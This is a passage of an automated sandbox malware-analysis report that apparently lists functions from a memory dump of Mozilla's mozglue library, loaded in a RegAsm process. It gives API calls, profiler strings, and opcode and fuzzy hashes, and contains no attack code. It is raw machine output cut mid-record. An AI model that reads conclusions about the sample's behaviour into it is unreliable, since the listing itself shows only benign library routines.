                                                                                      • Part of subcall function 6C6C4DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C6C4E5A
                                                                                      • Part of subcall function 6C6C4DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C6C4E97
                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C712C82
                                                                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C712E2D
                                                                                      • Part of subcall function 6C6D81B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6C6D81DE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: String$Double$Converter@double_conversion@@$Dtoa$Ascii@Builder@2@Builder@2@@Converter@CreateDecimalEcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestV12@__acrt_iob_func__stdio_common_vfprintfstrlen
                                                                                    • String ID: (root)$ProfileBuffer parse error: %s$expected a Time entry
                                                                                    • API String ID: 801438305-4149320968
                                                                                    • Opcode ID: 4889ebc0bba130c914ec364ffde80ad1b7b49e3e011fc863d850486b97cd708b
                                                                                    • Instruction ID: a0dc4d5ea6f0ee935708caa7c8ccdcafb7308b82e5d309ab695bd6992bd50a20
                                                                                    • Opcode Fuzzy Hash: 4889ebc0bba130c914ec364ffde80ad1b7b49e3e011fc863d850486b97cd708b
                                                                                    • Instruction Fuzzy Hash: 6891DFB060C7408FC724DF24C58969FB7E1EF8A358F14892DE59A8BB50EB30D949CB56
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: __aulldiv__aullrem
                                                                                    • String ID: -Infinity$NaN
                                                                                    • API String ID: 3839614884-2141177498
                                                                                    • Opcode ID: 7060cc37c3bc595d8f6096bfe894b46d22110d7efbf6c33a3d0703c20956c8ca
                                                                                    • Instruction ID: 7f226c44947ed8ae70a240a7dd14a4de955e140d8f1eb9cbf0be398a27ea7992
                                                                                    • Opcode Fuzzy Hash: 7060cc37c3bc595d8f6096bfe894b46d22110d7efbf6c33a3d0703c20956c8ca
                                                                                    • Instruction Fuzzy Hash: 2DC1D031F003188BDB24CFA8C950BAEB7B6FF85324F18452DD505ABB81D778A949CB91
                                                                                    APIs
                                                                                    • memset.VCRUNTIME140(?,000000FF,?), ref: 6C738A4B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: memset
                                                                                    • String ID: ~qll
                                                                                    • API String ID: 2221118986-1926955788
                                                                                    • Opcode ID: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
                                                                                    • Instruction ID: 62010fc6c7730ef0bb71e20bd2f7f021b3d42157a4d645cff980f538e29eaa6c
                                                                                    • Opcode Fuzzy Hash: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
                                                                                    • Instruction Fuzzy Hash: 36B1E772A0022ACFDB14CF68CD90799B7B2EF95314F1812AAC55DDB786D730A985CB90
                                                                                    APIs
                                                                                    • memset.VCRUNTIME140(?,000000FF,?), ref: 6C7388F0
                                                                                    • memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C73925C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: memset
                                                                                    • String ID: ~qll
                                                                                    • API String ID: 2221118986-1926955788
                                                                                    • Opcode ID: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
                                                                                    • Instruction ID: a42d0c70b9a4106fd3ce48efb1e181d71559f34bb370c0a535afa5d71f240ced
                                                                                    • Opcode Fuzzy Hash: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
                                                                                    • Instruction Fuzzy Hash: ECB1D672E0112ACFCB14CE58CD806EDB7B2AF94314F14427AC959DB786D730A989CB90
                                                                                    APIs
                                                                                    • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C738E18
                                                                                    • memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C73925C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: memset
                                                                                    • String ID: ~qll
                                                                                    • API String ID: 2221118986-1926955788
                                                                                    • Opcode ID: 8a04f876341ba59a6ddb8d2d2d5789db075aee54b4cc3de998e3f034435ba008
                                                                                    • Instruction ID: da431209e88de1e6442c186e450d949066af983031a7e69f6c546323725beb69
                                                                                    • Opcode Fuzzy Hash: 8a04f876341ba59a6ddb8d2d2d5789db075aee54b4cc3de998e3f034435ba008
                                                                                    • Instruction Fuzzy Hash: CFA1E872E00126CFCB14CF68CD80799B7B2AF95314F1542BAC95DEB786D730A999CB90
                                                                                    APIs
                                                                                      • Part of subcall function 6C6D9B80: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,6C72B92D), ref: 6C6D9BC8
                                                                                      • Part of subcall function 6C6D9B80: __Init_thread_footer.LIBCMT ref: 6C6D9BDB
                                                                                    • rand_s.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C6D03D4,?), ref: 6C72B955
                                                                                    • NtQueryVirtualMemory.NTDLL ref: 6C72B9A5
                                                                                    • NtQueryVirtualMemory.NTDLL ref: 6C72BA20
                                                                                    • RtlNtStatusToDosError.NTDLL ref: 6C72BA7B
                                                                                    • RtlSetLastWin32Error.NTDLL(00000000,00000000,00000000,?,00000000,?,0000001C,00000000), ref: 6C72BA81
                                                                                    • GetLastError.KERNEL32(00000000,00000000,00000000,?,00000000,?,0000001C,00000000), ref: 6C72BA86
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Error$LastMemoryQueryVirtual$InfoInit_thread_footerStatusSystemWin32rand_s
                                                                                    • String ID:
                                                                                    • API String ID: 1753913139-0
                                                                                    • Opcode ID: ee5fcc1fb658e3d39adaa17c364da9af1646ff504c5b3f2cad87ea32fd166100
                                                                                    • Instruction ID: d7b46d00472c99d9d250e9e7523269780e2d32c29e9ebfa44b51c8aee3ed0cb0
                                                                                    • Opcode Fuzzy Hash: ee5fcc1fb658e3d39adaa17c364da9af1646ff504c5b3f2cad87ea32fd166100
                                                                                    • Instruction Fuzzy Hash: 8C515D71E01229DFDF14CEA8DA84ADDB7B6BF88314F154129E906B7704DB34BD458B90
                                                                                    APIs
                                                                                    • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C717A81
                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C717A93
                                                                                      • Part of subcall function 6C6E5C50: GetTickCount64.KERNEL32 ref: 6C6E5D40
                                                                                      • Part of subcall function 6C6E5C50: EnterCriticalSection.KERNEL32(6C74F688), ref: 6C6E5D67
                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C717AA1
                                                                                      • Part of subcall function 6C6E5C50: __aulldiv.LIBCMT ref: 6C6E5DB4
                                                                                      • Part of subcall function 6C6E5C50: LeaveCriticalSection.KERNEL32(6C74F688), ref: 6C6E5DED
                                                                                    • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(FFFFFFFE,?,?,?), ref: 6C717B31
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Time$CriticalSectionStampV01@@Value@mozilla@@$BaseCount64DurationEnterLeaveNow@PlatformSeconds@Stamp@mozilla@@TickUtils@mozilla@@V12@___aulldiv
                                                                                    • String ID:
                                                                                    • API String ID: 4054851604-0
                                                                                    • Opcode ID: c8f8adfa2009089b3659310cf7c78dd83461ad5561eb176edfccac1c605340d8
                                                                                    • Instruction ID: 565159297a00b0765cd10390cb3fd828100b94c84ae043ffdd93872aa762d817
                                                                                    • Opcode Fuzzy Hash: c8f8adfa2009089b3659310cf7c78dd83461ad5561eb176edfccac1c605340d8
                                                                                    • Instruction Fuzzy Hash: A3B1A03560C3808BCB24CF25C55465FB7E2BFC9318F194A2DE99567B91DB70E90ACB82
                                                                                    APIs
                                                                                    • NtQueryVirtualMemory.NTDLL ref: 6C72B720
                                                                                    • RtlNtStatusToDosError.NTDLL ref: 6C72B75A
                                                                                    • RtlSetLastWin32Error.NTDLL(00000000,00000000,000000FF,00000000,00000000,?,0000001C,6C6FFE3F,00000000,00000000,?,?,00000000,?,6C6FFE3F), ref: 6C72B760
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Error$LastMemoryQueryStatusVirtualWin32
                                                                                    • String ID:
                                                                                    • API String ID: 304294125-0
                                                                                    APIs
                                                                                    • rand_s.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C6D03D4,?), ref: 6C72B955
                                                                                    • NtQueryVirtualMemory.NTDLL ref: 6C72B9A5
                                                                                    Similarity
                                                                                    • API ID: MemoryQueryVirtualrand_s
                                                                                    • String ID:
                                                                                    • API String ID: 1889792194-0
                                                                                    APIs
                                                                                    • LoadLibraryW.KERNEL32(user32,?,6C6FE1A5), ref: 6C725606
                                                                                    • LoadLibraryW.KERNEL32(gdi32,?,6C6FE1A5), ref: 6C72560F
                                                                                    • GetProcAddress.KERNEL32(00000000,GetThreadDpiAwarenessContext), ref: 6C725633
                                                                                    • GetProcAddress.KERNEL32(00000000,AreDpiAwarenessContextsEqual), ref: 6C72563D
                                                                                    • GetProcAddress.KERNEL32(00000000,EnableNonClientDpiScaling), ref: 6C72566C
                                                                                    • GetProcAddress.KERNEL32(00000000,GetSystemMetricsForDpi), ref: 6C72567D
                                                                                    • GetProcAddress.KERNEL32(00000000,GetDpiForWindow), ref: 6C725696
                                                                                    • GetProcAddress.KERNEL32(00000000,RegisterClassW), ref: 6C7256B2
                                                                                    • GetProcAddress.KERNEL32(00000000,CreateWindowExW), ref: 6C7256CB
                                                                                    • GetProcAddress.KERNEL32(00000000,ShowWindow), ref: 6C7256E4
                                                                                    • GetProcAddress.KERNEL32(00000000,SetWindowPos), ref: 6C7256FD
                                                                                    • GetProcAddress.KERNEL32(00000000,GetWindowDC), ref: 6C725716
                                                                                    • GetProcAddress.KERNEL32(00000000,FillRect), ref: 6C72572F
                                                                                    • GetProcAddress.KERNEL32(00000000,ReleaseDC), ref: 6C725748
                                                                                    • GetProcAddress.KERNEL32(00000000,LoadIconW), ref: 6C725761
                                                                                    • GetProcAddress.KERNEL32(00000000,LoadCursorW), ref: 6C72577A
                                                                                    • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 6C725793
                                                                                    • GetProcAddress.KERNEL32(00000000,GetMonitorInfoW), ref: 6C7257A8
                                                                                    • GetProcAddress.KERNEL32(00000000,SetWindowLongPtrW), ref: 6C7257BD
                                                                                    • GetProcAddress.KERNEL32(?,StretchDIBits), ref: 6C7257D5
                                                                                    • GetProcAddress.KERNEL32(?,CreateSolidBrush), ref: 6C7257EA
                                                                                    • GetProcAddress.KERNEL32(?,DeleteObject), ref: 6C7257FF
                                                                                    Similarity
                                                                                    • API ID: AddressProc$LibraryLoad
                                                                                    • String ID: AreDpiAwarenessContextsEqual$CreateSolidBrush$CreateWindowExW$DeleteObject$EnableNonClientDpiScaling$FillRect$GetDpiForWindow$GetMonitorInfoW$GetSystemMetricsForDpi$GetThreadDpiAwarenessContext$GetWindowDC$LoadCursorW$LoadIconW$MonitorFromWindow$RegisterClassW$ReleaseDC$SetWindowLongPtrW$SetWindowPos$ShowWindow$StretchDIBits$gdi32$user32
                                                                                    • API String ID: 2238633743-1964193996
                                                                                    APIs
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,default,?,6C6D582D), ref: 6C70CC27
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,java,?,?,?,6C6D582D), ref: 6C70CC3D
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,6C73FE98,?,?,?,?,?,6C6D582D), ref: 6C70CC56
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,leaf,?,?,?,?,?,?,?,6C6D582D), ref: 6C70CC6C
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,mainthreadio,?,?,?,?,?,?,?,?,?,6C6D582D), ref: 6C70CC82
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileio,?,?,?,?,?,?,?,?,?,?,?,6C6D582D), ref: 6C70CC98
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileioall,?,?,?,?,?,?,?,?,?,?,?,?,?,6C6D582D), ref: 6C70CCAE
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,noiostacks), ref: 6C70CCC4
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,screenshots), ref: 6C70CCDA
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,seqstyle), ref: 6C70CCEC
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,stackwalk), ref: 6C70CCFE
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,jsallocations), ref: 6C70CD14
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nostacksampling), ref: 6C70CD82
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,preferencereads), ref: 6C70CD98
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nativeallocations), ref: 6C70CDAE
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ipcmessages), ref: 6C70CDC4
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,audiocallbacktracing), ref: 6C70CDDA
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpu), ref: 6C70CDF0
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,notimerresolutionchange), ref: 6C70CE06
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpuallthreads), ref: 6C70CE1C
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,samplingallthreads), ref: 6C70CE32
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,markersallthreads), ref: 6C70CE48
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,unregisteredthreads), ref: 6C70CE5E
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,processcpu), ref: 6C70CE74
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,power), ref: 6C70CE8A
                                                                                    Similarity
                                                                                    • API ID: strcmp
                                                                                    • String ID: Unrecognized feature "%s".$audiocallbacktracing$cpuallthreads$default$fileio$fileioall$ipcmessages$java$jsallocations$leaf$mainthreadio$markersallthreads$nativeallocations$noiostacks$nostacksampling$notimerresolutionchange$power$preferencereads$processcpu$samplingallthreads$screenshots$seqstyle$stackwalk$unregisteredthreads
                                                                                    • API String ID: 1004003707-2809817890
                                                                                    APIs
                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING), ref: 6C6D4801
                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C6D4817
                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C6D482D
                                                                                    • __Init_thread_footer.LIBCMT ref: 6C6D484A
                                                                                      • Part of subcall function 6C6FAB3F: EnterCriticalSection.KERNEL32(6C74E370,?,?,6C6C3527,6C74F6CC,?,?,?,?,?,?,?,?,6C6C3284), ref: 6C6FAB49
                                                                                      • Part of subcall function 6C6FAB3F: LeaveCriticalSection.KERNEL32(6C74E370,?,6C6C3527,6C74F6CC,?,?,?,?,?,?,?,?,6C6C3284,?,?,6C6E56F6), ref: 6C6FAB7C
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C6D485F
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C6D487E
                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C74F4B8), ref: 6C6D488B
                                                                                    • free.MOZGLUE(?), ref: 6C6D493A
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6D4956
                                                                                    • free.MOZGLUE(00000000), ref: 6C6D4960
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C74F4B8), ref: 6C6D499A
                                                                                      • Part of subcall function 6C6FAB89: EnterCriticalSection.KERNEL32(6C74E370,?,?,?,6C6C34DE,6C74F6CC,?,?,?,?,?,?,?,6C6C3284), ref: 6C6FAB94
                                                                                      • Part of subcall function 6C6FAB89: LeaveCriticalSection.KERNEL32(6C74E370,?,6C6C34DE,6C74F6CC,?,?,?,?,?,?,?,6C6C3284,?,?,6C6E56F6), ref: 6C6FABD1
                                                                                    • free.MOZGLUE(?), ref: 6C6D49C6
                                                                                    • free.MOZGLUE(?), ref: 6C6D49E9
                                                                                      • Part of subcall function 6C6E5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C6E5EDB
                                                                                      • Part of subcall function 6C6E5E90: memset.VCRUNTIME140(ewrl,000000E5,?), ref: 6C6E5F27
                                                                                      • Part of subcall function 6C6E5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C6E5FB2
                                                                                    Strings
                                                                                    • MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C6D4812
                                                                                    • [I %d/%d] profiler_shutdown, xrefs: 6C6D4A06
                                                                                    • MOZ_PROFILER_SHUTDOWN, xrefs: 6C6D4A42
                                                                                    • MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C6D47FC
                                                                                    • MOZ_BASE_PROFILER_LOGGING, xrefs: 6C6D4828
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$free$EnterLeavegetenv$CurrentExclusiveLockThread$AcquireInit_thread_footerReleasememset
                                                                                    • String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING$MOZ_PROFILER_SHUTDOWN$[I %d/%d] profiler_shutdown
                                                                                    • API String ID: 1340022502-4194431170
                                                                                    APIs
                                                                                      • Part of subcall function 6C6D4730: GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6C6D44B2,6C74E21C,6C74F7F8), ref: 6C6D473E
                                                                                      • Part of subcall function 6C6D4730: GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6C6D474A
                                                                                    • GetModuleHandleW.KERNEL32(WRusr.dll), ref: 6C6D44BA
                                                                                    • LoadLibraryW.KERNEL32(kernel32.dll), ref: 6C6D44D2
                                                                                    • InitOnceExecuteOnce.KERNEL32(6C74F80C,6C6CF240,?,?), ref: 6C6D451A
                                                                                    • GetModuleHandleW.KERNEL32(user32.dll), ref: 6C6D455C
                                                                                    • LoadLibraryW.KERNEL32(?), ref: 6C6D4592
                                                                                    • InitializeCriticalSection.KERNEL32(6C74F770), ref: 6C6D45A2
                                                                                    • moz_xmalloc.MOZGLUE(00000008), ref: 6C6D45AA
                                                                                    • moz_xmalloc.MOZGLUE(00000018), ref: 6C6D45BB
                                                                                    • InitOnceExecuteOnce.KERNEL32(6C74F818,6C6CF240,?,?), ref: 6C6D4612
                                                                                    • ?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 6C6D4636
                                                                                    • LoadLibraryW.KERNEL32(user32.dll), ref: 6C6D4644
                                                                                    • memset.VCRUNTIME140(?,00000000,00000114), ref: 6C6D466D
                                                                                    • VerSetConditionMask.NTDLL ref: 6C6D469F
                                                                                    • VerSetConditionMask.NTDLL ref: 6C6D46AB
                                                                                    • VerSetConditionMask.NTDLL ref: 6C6D46B2
                                                                                    • VerSetConditionMask.NTDLL ref: 6C6D46B9
                                                                                    • VerSetConditionMask.NTDLL ref: 6C6D46C0
                                                                                    • VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C6D46CD
                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 6C6D46F1
                                                                                    • GetProcAddress.KERNEL32(00000000,NativeNtBlockSet_Write), ref: 6C6D46FD
                                                                                    Similarity
                                                                                    • API ID: ConditionMask$HandleModuleOnce$LibraryLoad$AddressExecuteInitProcmoz_xmalloc$CriticalDown@mozilla@@InfoInitializeLockedSectionVerifyVersionWin32kmemset
                                                                                    • String ID: Gtl$NativeNtBlockSet_Write$WRusr.dll$kernel32.dll$l$user32.dll
                                                                                    • API String ID: 1702738223-2699975829
                                                                                    APIs
                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C74F760), ref: 6C6D19BD
                                                                                    • GetCurrentProcess.KERNEL32 ref: 6C6D19E5
                                                                                    • GetLastError.KERNEL32 ref: 6C6D1A27
                                                                                    • moz_xmalloc.MOZGLUE(?), ref: 6C6D1A41
                                                                                    • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C6D1A4F
                                                                                    • GetLastError.KERNEL32 ref: 6C6D1A92
                                                                                    • moz_xmalloc.MOZGLUE(?), ref: 6C6D1AAC
                                                                                    • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C6D1ABA
                                                                                    • LocalFree.KERNEL32(?), ref: 6C6D1C69
                                                                                    • free.MOZGLUE(?), ref: 6C6D1C8F
                                                                                    • free.MOZGLUE(?), ref: 6C6D1C9D
                                                                                    • CloseHandle.KERNEL32(?), ref: 6C6D1CAE
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C74F760), ref: 6C6D1D52
                                                                                    • GetLastError.KERNEL32 ref: 6C6D1DA5
                                                                                    • GetLastError.KERNEL32 ref: 6C6D1DFB
                                                                                    • GetLastError.KERNEL32 ref: 6C6D1E49
                                                                                    • GetLastError.KERNEL32 ref: 6C6D1E68
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6D1E9B
                                                                                      • Part of subcall function 6C6D2070: LoadLibraryW.KERNEL32(combase.dll,6C6D1C5F), ref: 6C6D20AE
                                                                                      • Part of subcall function 6C6D2070: GetProcAddress.KERNEL32(00000000,CoInitializeSecurity), ref: 6C6D20CD
                                                                                      • Part of subcall function 6C6D2070: __Init_thread_footer.LIBCMT ref: 6C6D20E1
                                                                                    • memset.VCRUNTIME140(?,00000000,00000110), ref: 6C6D1F15
                                                                                    • VerSetConditionMask.NTDLL ref: 6C6D1F46
                                                                                    • VerSetConditionMask.NTDLL ref: 6C6D1F52
                                                                                    • VerSetConditionMask.NTDLL ref: 6C6D1F59
                                                                                    • VerSetConditionMask.NTDLL ref: 6C6D1F60
                                                                                    • VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C6D1F6D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
